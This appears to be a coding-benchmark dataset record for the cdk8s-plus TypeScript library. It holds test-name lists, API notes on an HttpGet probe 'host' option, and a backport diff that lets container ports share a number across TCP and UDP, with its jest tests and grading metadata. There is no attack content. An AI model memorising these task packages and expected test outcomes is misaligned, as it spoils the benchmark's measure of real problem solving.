periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "can select namespaces", "can select all namespaces", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress" ]
Method: Action.fromHttpGet(container: Container, path: string, options: { port?: number; scheme?: ConnectionScheme; host?: string } = {}): k8s.HttpGetAction Location: src/_action.ts Inputs: - **container** – Container instance whose ports may be used as a default for the HTTP GET action. - **path** – The request path to probe (e.g., “/health”). - **options** – Optional overrides: - **port** (number) – target port; defaults to the container’s port or 80. - **scheme** (ConnectionScheme) – “HTTP” or “HTTPS”; defaults to HTTP. - **host** (string) – host name or IP to connect to; if omitted the pod IP is used. Outputs: Returns a `k8s.HttpGetAction` object containing `path`, `port` (as `IntOrString`), `scheme`, and, when supplied, `host`. Description: Constructs a Kubernetes `HttpGetAction` for use in probes, now supporting an explicit `host` field to target a specific hostname or IP. Interface: HttpGetProbeOptions Location: src/probe.ts Inputs (properties): - **scheme?** – `ConnectionScheme`; defaults to HTTP. - **host?** – string; the host name to connect to on the container (defaults to the pod IP). - (other properties inherited from `ProbeOptions` such as `port`, `initialDelaySeconds`, etc.). Outputs: N/A (pure data shape). Description: Configuration object for HTTP GET probes. The interface now includes an optional `host` property allowing callers to specify the target host for the HTTP request.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 2, "num_modified_lines": 14, "pr_author": "serhatcetinkaya", "pr_labels": [ "backport-to-k8s-27/main: Backport a PR to the k8s-27 branch", "backport-to-k8s-28/main: Backport a PR to the k8s-28 branch" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.98, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.26/#httpgetaction-v1-core" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding a `host` property to HttpGet probes and updating the API accordingly. The test changes assert that the `host` field is present in the generated probe configuration, matching the intended behavior. There are no signs of test coupling, naming expectations, missing specs, or external dependencies beyond the linked documentation, so the task is well‑specified and solvable. Therefore it is classified as a clean A‑type task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
e526be13b072255a753bb36aa97c1fd5cd839005
2024-04-07 09:03:08
cdk8s-team__cdk8s-plus-3988
diff --git a/src/container.ts b/src/container.ts index 3357c648..28048a6e 100644 --- a/src/container.ts +++ b/src/container.ts @@ -820,14 +820,15 @@ export class Container { public addPort(port: ContainerPort) { const names = this._ports.map(p => p.name).filter(x => x); - const numbers = this._ports.map(p => p.number); + const numberProtocols = this._ports.map(p => `${p.number}/${p.protocol || Protocol.TCP}`); if (port.name && names.includes(port.name)) { throw new Error(`Port with name ${port.name} already exists`); } - if (numbers.includes(port.number)) { - throw new Error(`Port with number ${port.number} already exists`); + const protocol = `${port.number}/${port.protocol || Protocol.TCP}`; + if (numberProtocols.includes(protocol)) { + throw new Error(`Port with number ${port.number} and protocol ${port.protocol || Protocol.TCP} already exists`); } this._ports.push(port);
fix(container): allow the same port number with different protocols (#3508) # Backport This will backport the following commits from `k8s-28/main` to `k8s-26/main`: - [fix(container): allow the same port number with different protocols (#3508)](https://github.com/cdk8s-team/cdk8s-plus/pull/3508) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Allow containers to expose the same port number with different protocols **Problem** Container definitions reject duplicate port numbers even when the protocols differ, preventing legitimate configurations such as TCP and UDP on the same numeric port. **Root Cause** Port uniqueness checks considered only the numeric value, ignoring the associated protocol. **Fix / Expected Behavior** - Validate port uniqueness based on the combination of number **and** protocol. - Permit multiple ports that share the same number as long as their protocols are distinct. - Preserve existing error handling for truly duplicate (number + protocol) entries. - Update error messages to reflect the combined number‑protocol context. **Risk & Validation** - Verify that existing containers with duplicate numbers and identical protocols continue to raise errors. - Add tests covering allowed same-number‑different‑protocol scenarios and disallowed same-number‑same‑protocol cases. - Ensure no regressions in container port handling across supported Kubernetes versions.
3,988
cdk8s-team/cdk8s-plus
diff --git a/test/container.test.ts b/test/container.test.ts index 331b6fd5..eccb9ba7 100644 --- a/test/container.test.ts +++ b/test/container.test.ts @@ -180,23 +180,56 @@ describe('EnvValue', () => { describe('Container', () => { - test('cannot configure identical ports at instantiation', () => { + test('cannot configure identical ports and protocols at instantiation', () => { expect(() => new kplus.Container({ image: 'image', ports: [ { number: 8080, + protocol: kplus.Protocol.TCP, }, { number: 8080, + protocol: kplus.Protocol.TCP, }, ], - })).toThrowError('Port with number 8080 already exists'); + })).toThrowError('Port with number 8080 and protocol TCP already exists'); }); - test('cannot add an already existing port number', () => { + test('can configure identical ports with different protocols at instantiation', () => { + const container = new kplus.Container({ + image: 'image', + ports: [ + { + number: 8080, + protocol: kplus.Protocol.TCP, + }, + { + number: 8080, + protocol: kplus.Protocol.UDP, + }, + ], + }); + + expect(container._toKube().ports).toEqual([{ + containerPort: 8080, + protocol: 'TCP', + }, { + containerPort: 8080, + protocol: 'UDP', + }]); + expect(container.ports).toEqual([{ + number: 8080, + protocol: kplus.Protocol.TCP, + }, { + number: 8080, + protocol: kplus.Protocol.UDP, + }]); + }); + + test('cannot add an already existing port number with identical protocol', () => { const container = new kplus.Container({ image: 'image', @@ -205,8 +238,38 @@ describe('Container', () => { }], }); - expect(() => container.addPort({ number: 8080 })).toThrowError('Port with number 8080 already exists'); + expect(() => container.addPort({ number: 8080 })).toThrowError('Port with number 8080 and protocol TCP already exists'); + + }); + + test('can add an already existing port number with a different protocol', () => { + + const container = new kplus.Container({ + image: 'image', + ports: [{ + number: 8080, + protocol: kplus.Protocol.TCP, + }], + }); + container.addPort({ + number: 8080, + protocol: kplus.Protocol.UDP, + }); + expect(container._toKube().ports).toEqual([{ + containerPort: 8080, + protocol: 'TCP', + }, { + containerPort: 8080, + protocol: 'UDP', + }]); + expect(container.ports).toEqual([{ + number: 8080, + protocol: kplus.Protocol.TCP, + }, { + number: 8080, + protocol: kplus.Protocol.UDP, + }]); }); test('cannot add an already existing port name', () => {
[ "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol" ]
[ "defaultChild", "defaults", "can select namespaces", "can select all namespaces", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "can grant permissions on imported", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "default child", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "fromCommand", "fromHttpGet", "fromTcpSocket", "targets a deployment that has containers with volume mounts", "default configuration", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "Synthesizes spec lazily", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "custom configuration", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "Can mutate metadata" ]
Method: Container.addPort(port: ContainerPort) Location: src/container.ts (around line 820) Inputs: - **port** – an object describing the container port with the following fields: - `number` (number, required): the numeric port value. - `name` (string, optional): an identifier for the port. - `protocol` (Protocol enum, optional): the transport protocol (e.g., `Protocol.TCP` or `Protocol.UDP`). If omitted, defaults to `Protocol.TCP`. Outputs: - **void** – the method mutates the container by adding the supplied port. - **Error** – throws `Error` with message `Port with number <number> and protocol <protocol> already exists` when a port with the same *number* + *protocol* combination is already present in the container. Description: Adds a new port definition to the container while enforcing uniqueness of the (port number, protocol) pair. This enables configuring multiple ports that share the same numeric value but differ in protocol (e.g., TCP vs UDP). It is invoked directly in tests via `container.addPort({ number: 8080 })` and `container.addPort({ number: 8080, protocol: kplus.Protocol.UDP })`.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 4, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.88, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/3508", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue aims to allow containers to expose the same numeric port with different protocols, but the issue description only contains backport metadata and lacks explicit acceptance criteria, making the intent only partially described. The provided test patch clearly specifies the expected behavior and error messages, and the tests are consistent with that behavior, showing no misalignment. The primary problem is the ambiguous specification in the issue text, which classifies this as a B4 (AMBIGUOUS_SPEC) case.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
d97429df6d4752cc10470c4504b66442030cf393
2024-04-07 09:03:13
cdk8s-team__cdk8s-plus-3989
diff --git a/src/container.ts b/src/container.ts index 3357c648..28048a6e 100644 --- a/src/container.ts +++ b/src/container.ts @@ -820,14 +820,15 @@ export class Container { public addPort(port: ContainerPort) { const names = this._ports.map(p => p.name).filter(x => x); - const numbers = this._ports.map(p => p.number); + const numberProtocols = this._ports.map(p => `${p.number}/${p.protocol || Protocol.TCP}`); if (port.name && names.includes(port.name)) { throw new Error(`Port with name ${port.name} already exists`); } - if (numbers.includes(port.number)) { - throw new Error(`Port with number ${port.number} already exists`); + const protocol = `${port.number}/${port.protocol || Protocol.TCP}`; + if (numberProtocols.includes(protocol)) { + throw new Error(`Port with number ${port.number} and protocol ${port.protocol || Protocol.TCP} already exists`); } this._ports.push(port);
fix(container): allow the same port number with different protocols (#3508) # Backport This will backport the following commits from `k8s-28/main` to `k8s-27/main`: - [fix(container): allow the same port number with different protocols (#3508)](https://github.com/cdk8s-team/cdk8s-plus/pull/3508) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
